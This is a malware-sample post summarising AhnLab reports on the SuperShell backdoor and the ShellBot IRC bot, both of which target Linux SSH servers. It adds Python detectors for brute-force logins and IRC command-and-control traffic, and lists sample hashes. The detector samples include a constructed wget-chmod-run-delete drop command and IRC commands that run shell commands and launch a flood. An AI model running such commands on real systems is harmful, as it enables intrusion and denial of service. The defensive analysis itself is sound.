2024-09-12 SUPERSHELL + 2023-03-13 SHELLBOT Targeting Linux SSH servers Samples
2024-09-12 Ahnlab: SuperShell malware targeting Linux SSH servers
- SuperShell is a backdoor targeting Linux SSH servers. It is written in Go, so the same code base runs on Linux, Windows and Android, and it is attributed to a Chinese-speaking developer. It works as a reverse shell: the infected host connects out to the operator, who can then run commands on it. The attacks begin with brute-force and dictionary attacks against SSH servers using weak credentials such as "root/password" and "root/123456qwerty". Once logged in, the attacker runs a series of commands that download and install SuperShell with wget, curl, tftp or FTP; the download sources are often other compromised servers.
- SuperShell's obfuscation complicates analysis, but the binary can still be identified by specific internal strings and by its runtime behavior. The installation commands stage the payload in directories such as /tmp, /var/run, /mnt and /root and frequently end with a clean-up step that deletes the working files (rm -r *). The typical chain downloads a script or binary, marks it executable with chmod +x, and runs it (./ssh1); chmod +x grants no extra privileges, it only sets the execute bit on the dropped file. The same download/chmod/run sequence is repeated across several commands, each with a different download tool, so deployment still succeeds if one tool is missing or blocked.
- The attackers also frequently deploy XMRig, a Monero miner, alongside SuperShell, which suggests a dual purpose: keeping persistent control of the system while using its CPU to mine cryptocurrency.
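The two observable stages above (a password-guessing run that ends in an accepted login, then a download/chmod/run/cleanup command) are what a defender can actually hunt for. The script below is an added example written for this page, not code from the AhnLab report or the Contagio post: it scores constructed sshd log lines and a constructed command line against those indicators. The addresses are documentation ranges, and the failure threshold, regexes and indicator names are assumptions.

```python
"""Spot the SSH brute-force -> drop-and-run chain described above.

Added example for this page; it is not code from the AhnLab report or the
Contagio post. The sshd log lines and the command line below are constructed,
the 203.0.113.x / 198.51.100.x addresses are documentation ranges, and the
failure threshold and indicator list are the author's assumptions.
"""
import re
from collections import defaultdict

# Constructed sshd log: a dictionary attack from one address that ends in a
# successful root login, plus an unrelated single failure from a second one.
SAMPLE_AUTH_LOG = """\
Sep 12 03:14:01 host sshd[2101]: Failed password for root from 203.0.113.7 port 51112 ssh2
Sep 12 03:14:02 host sshd[2103]: Failed password for root from 203.0.113.7 port 51114 ssh2
Sep 12 03:14:03 host sshd[2105]: Failed password for invalid user admin from 203.0.113.7 port 51116 ssh2
Sep 12 03:14:04 host sshd[2107]: Failed password for root from 203.0.113.7 port 51118 ssh2
Sep 12 03:14:05 host sshd[2109]: Failed password for root from 203.0.113.7 port 51120 ssh2
Sep 12 03:14:06 host sshd[2111]: Accepted password for root from 203.0.113.7 port 51122 ssh2
Sep 12 03:20:10 host sshd[2150]: Failed password for root from 198.51.100.9 port 40000 ssh2
"""

# Constructed post-login command, shaped like the chain in the report
# (stage in /tmp, fetch, chmod +x, run, wipe the directory).
SAMPLE_DROP_COMMAND = "cd /tmp; wget http://203.0.113.7/ssh1.sh; chmod +x ssh1.sh; ./ssh1.sh; rm -r *"

FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted password for (\S+) from (\S+) port")


def find_bruteforce_logins(log_text, threshold=5):
    """Return {ip: (user, failures)} for each source address whose password
    login was accepted after at least `threshold` failed attempts."""
    failures = defaultdict(int)
    hits = {}
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group(2)] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            user, ip = m.groups()
            if failures[ip] >= threshold:
                hits[ip] = (user, failures[ip])
    return hits


# Indicators in the order the chain runs them. Names and regexes are assumptions.
INDICATORS = [
    ("staging_dir", re.compile(r"\bcd\s+(?:/tmp|/var/run|/mnt|/root)\b")),
    ("fetch_tool", re.compile(r"\b(?:wget|curl|tftp|ftp)\b")),
    ("make_executable", re.compile(r"\bchmod\s+(?:[ugoa]*\+x|[0-7]{3,4})\b")),
    ("exec_dropped", re.compile(r"(?:^|[;&|])\s*\./\S+")),
    ("cleanup", re.compile(r"\brm\s+-rf?\s+\*")),
]


def command_indicators(cmdline):
    """List the deployment-chain indicators present in one shell command line
    (for example one recorded by auditd or read from a shell history)."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def is_deployment_chain(cmdline, minimum=3):
    """A single fetch or chmod is everyday admin work; three or more of the
    indicators in one command line is the pattern worth alerting on."""
    return len(command_indicators(cmdline)) >= minimum


if __name__ == "__main__":
    print(find_bruteforce_logins(SAMPLE_AUTH_LOG))
    print(command_indicators(SAMPLE_DROP_COMMAND), is_deployment_chain(SAMPLE_DROP_COMMAND))
```

The brute-force check deliberately keys on the accepted login rather than on failure volume alone: failure floods against an exposed SSH port are background noise, while a success that follows them is the event that starts the chain. The command scorer requires several indicators at once for the same reason, since `cd /tmp; wget ...` on its own is routine administration.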
2023-03-13 Ahnlab: ShellBot Malware Being Distributed to Linux SSH Servers
- On March 13, 2023, ASEC reported that ShellBot, a Perl-based DDoS bot, is being installed on Linux SSH servers. The attackers brute-force weak SSH credentials to get in and then deploy the bot. Once installed, ShellBot connects to a command and control (C&C) server over the IRC protocol, through which the operator issues commands, steals data and launches DDoS attacks.
- Initial access: attackers scan for servers with SSH exposed (port 22) and use brute-force tools to guess weak or default credentials.
- Installation: after gaining access, the attacker deploys ShellBot, often making it persistent by modifying startup scripts or cron jobs.
- IRC protocol: ShellBot is an IRC client. It registers with the server, joins a channel and reads its commands (run a remote task, start a DDoS attack) from messages posted there, so the operator needs no custom C&C infrastructure; any IRC server, public or attacker-run, will do.
- Customization: ShellBot is highly customizable, and variants such as "LiGhT's Modded perlbot v2" offer different capabilities and attack methods, adapted by the various threat actors who use them.
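Because the bot speaks plain IRC, the C&C session has a recognizable shape on the wire: a client registration (NICK, USER), a JOIN to the operator's channel, PING/PONG keep-alives, and operator commands arriving as PRIVMSG text. The script below is an added example for this page, not code from the ASEC report or the Contagio post: it parses a constructed flow of both sides' messages and flags the bot-like pattern. The nick, channel, server name, port and the "!"-prefixed commands are assumptions chosen to illustrate the protocol, not observed indicators.

```python
"""Recognise an IRC command-and-control session of the kind ShellBot uses.

Added example for this page; it is not code from the ASEC report or the
Contagio post. The exchange below is constructed: the nick, channel, port,
server name and the "!"-prefixed operator commands are assumptions chosen to
illustrate the handshake and command flow, not observed indicators.
"""
import re

# Constructed flow as (direction, destination port, payload). "C>" is
# bot-to-server, "S<" is server-to-bot. The bot registers (NICK/USER), joins
# the operator's channel, answers the server's keep-alive, then receives
# commands as channel messages. 5050 stands in for a non-standard IRC port.
SAMPLE_FLOW = [
    ("C>", 5050, "NICK [x]-4512\r\n"),
    ("C>", 5050, "USER bot 8 * :bot\r\n"),
    ("S<", 5050, ":irc.example.net 001 [x]-4512 :Welcome\r\n"),
    ("C>", 5050, "JOIN #ops secret\r\n"),
    ("S<", 5050, "PING :irc.example.net\r\n"),
    ("C>", 5050, "PONG :irc.example.net\r\n"),
    ("S<", 5050, ":admin!a@h PRIVMSG #ops :!cmd uname -a\r\n"),
    ("S<", 5050, ":admin!a@h PRIVMSG #ops :!flood 198.51.100.5 80 60\r\n"),
]

STANDARD_IRC_PORTS = {6667, 6697}

# Optional ":prefix", then a word command or 3-digit numeric, then params:
# the RFC 1459 line shape.
IRC_LINE_RE = re.compile(r"^(?::(?P<prefix>\S+) )?(?P<cmd>[A-Za-z]+|\d{3})(?: (?P<params>.*))?$")


def parse_irc_line(raw):
    """Split one IRC line into (prefix, COMMAND, params, trailing) or None."""
    m = IRC_LINE_RE.match(raw.rstrip("\r\n"))
    if not m:
        return None
    params_str = m.group("params") or ""
    if params_str.startswith(":"):
        params, trailing = [], params_str[1:]
    elif " :" in params_str:
        head, trailing = params_str.split(" :", 1)
        params = head.split()
    else:
        params, trailing = params_str.split(), None
    return m.group("prefix"), m.group("cmd").upper(), params, trailing


def analyse_session(flow, command_prefix="!"):
    """Summarise a flow: did the client complete an IRC registration, which
    nick and channel did it use, which operator commands arrived, and was the
    server on a port other than 6667/6697."""
    summary = {"nick": None, "channel": None, "handshake": False,
               "commands": [], "nonstandard_port": False}
    client_cmds = set()
    for direction, port, payload in flow:
        if port not in STANDARD_IRC_PORTS:
            summary["nonstandard_port"] = True
        parsed = parse_irc_line(payload)
        if parsed is None:
            continue
        _prefix, cmd, params, trailing = parsed
        if direction == "C>":
            client_cmds.add(cmd)
            if cmd == "NICK" and params:
                summary["nick"] = params[0]
            elif cmd == "JOIN" and params:
                summary["channel"] = params[0]
        elif cmd == "PRIVMSG" and trailing and trailing.startswith(command_prefix):
            summary["commands"].append(trailing)
    summary["handshake"] = {"NICK", "USER", "JOIN"} <= client_cmds
    return summary


def is_irc_c2(summary):
    """Registration plus at least one prefixed channel command is the bot-like
    pattern; registration alone is what any IRC client does."""
    return summary["handshake"] and bool(summary["commands"])


if __name__ == "__main__":
    s = analyse_session(SAMPLE_FLOW)
    print(s, is_irc_c2(s))
```

The parser works on payload text regardless of port, which matters because port-based IRC signatures miss bots pointed at an arbitrary port; the `nonstandard_port` flag is reported separately so an analyst can weigh it rather than have it gate the detection.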
File Information
├── SHELLBOT
│   ├── 2220783661db230d0808a5750060950688e2618d462ccbe07f54408154c227c1 .pl
│   ├── b7d62d1a145ddda241e624ef94ab31fcca1a13f79e130d0a704586e35745282a .pl
│   ├── e476b9c07fcd80824d4eafce0e826ae1c12706ca6215eb6e3995468374bb8a76 .pl
│   ├── f5a26a68344c1ffd136ba73dec9d08f61212872cdba33bd4d7d32733a72e4ed5 .pl
│   └── Other Shellbot samples
│       ├── 0857f90be97326ff45f17ec3f6ce60d9a0f6d8faed34e48527fde5ec30bd5a0d
│       ├── 0c1673e442b945a0aecf60d3970e924b16bd72d46e257bd72927821e4ebbc9ca
│       ├── 1f3c279ea684d5cbdc7004819bf15a160f70b2c79c4affd309f9ab3ad957045b
│       ├── 5ba1d0efb313ccc20e3d5f2476a3db811e15c80c3f1ac73b7a02d80c5c49c728
│       ├── a26de5b607e3a66af8b7db2c13bcd1c658817649c699f8731db6f237c3c5b1ce
│       └── cb80570332e3e32037f426e835d05bdcd276e9e5acfd439027d788dd64dcb47d
└── SUPERSHELL
    ├── 157bea84012ca8b8dc6c0eabf80db1f0256eafccf4047d3e4e90c50ed42e69ff ssh1.sh
    ├── 23dbfb99fc6c4fcfc279100c4b6481a7fd3f0b061b8d915604efa2ba37c8ddfa setup c3pool miner.sh
    └── cf5a7b7c71564a5eef77cc5297b9ffd6cd021eb44c0901ea3957cb2397b43e15 ssh1
- Over the 15 years this blog has been around, many hosting providers have dropped support because of stricter no-malware policies, which has left broken links, especially in older posts. If you find a broken link on contagiodump.blogspot.com (or contagiominidump.blogspot.com), note the file name from the URL and search for it in the Contagio Malware Storage.